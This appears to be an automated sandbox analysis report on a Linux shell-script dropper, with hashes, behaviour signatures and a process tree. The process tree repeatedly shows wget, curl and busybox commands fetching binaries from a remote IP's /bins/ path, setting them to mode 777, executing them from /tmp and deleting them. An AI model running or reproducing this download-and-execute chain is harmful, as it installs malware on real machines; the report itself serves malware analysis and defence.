Analysis
-
max time kernel
19s -
max time network
21s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 02:00
Static task
static1
Behavioral task
behavioral1
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
-
Size
10KB
-
MD5
f542050a645c72e971d62a3493d03ae4
-
SHA1
9517efa75044c18478c68a6d42b01b42a2af2329
-
SHA256
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c
-
SHA512
2934d0671bff24eb6ed85dc500e0d6b40470feb320ea6561cda2cb0e9aca88122ba2739e65472e29c40a565454c1182288cf4f4feb19d9143e1ecd3daab76a26
-
SSDEEP
96:VVRM3rrZCbd1HK0VBiVtx2VNzk4atFzbUeVRM3rrlXkbd1/f3s1O5VBiVtn:0Cbd1q0VBiVtx2VNGjd1jVBiVtn
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 713 chmod 778 chmod 838 chmod 844 chmod 695 chmod 824 chmod 764 chmod 731 chmod 753 chmod 796 chmod 812 chmod 818 chmod 830 chmod 850 chmod 688 chmod 856 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe 689 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 696 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP 714 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX 732 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe 755 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf 765 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 780 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE 798 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq 813 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC 819 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH 825 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l 831 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 839 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP 845 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC 851 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH 857 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH -
Checks CPU configuration 1 TTPs 16 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 curl File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC curl File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP curl File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 curl File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE curl File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC curl File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH curl File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l curl File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP curl File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH curl File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe curl File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 curl File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX curl File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf curl File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe curl File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq curl
Processes
-
/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh1⤵PID:655
-
/bin/rm/bin/rm bins.sh2⤵PID:658
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:663
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:678
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:685
-
-
/bin/chmodchmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:691
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:692
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:693
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:694
-
-
/bin/chmodchmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Executes dropped EXE
PID:696
-
-
/bin/rmrm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:697
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:698
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:709
-
-
/bin/chmodchmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Executes dropped EXE
PID:714
-
-
/bin/rmrm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:717
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:726
-
-
/bin/chmodchmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:734
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:749
-
-
/bin/chmodchmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:757
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:763
-
-
/bin/chmodchmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:774
-
-
/bin/chmodchmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:781
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:783
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:793
-
-
/bin/chmodchmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:801
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:811
-
-
/bin/chmodchmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:817
-
-
/bin/chmodchmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:820
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:823
-
-
/bin/chmodchmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:829
-
-
/bin/chmodchmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:832
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:837
-
-
/bin/chmodchmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:843
-
-
/bin/chmodchmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:849
-
-
/bin/chmodchmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:855
-
-
/bin/chmodchmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:859
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97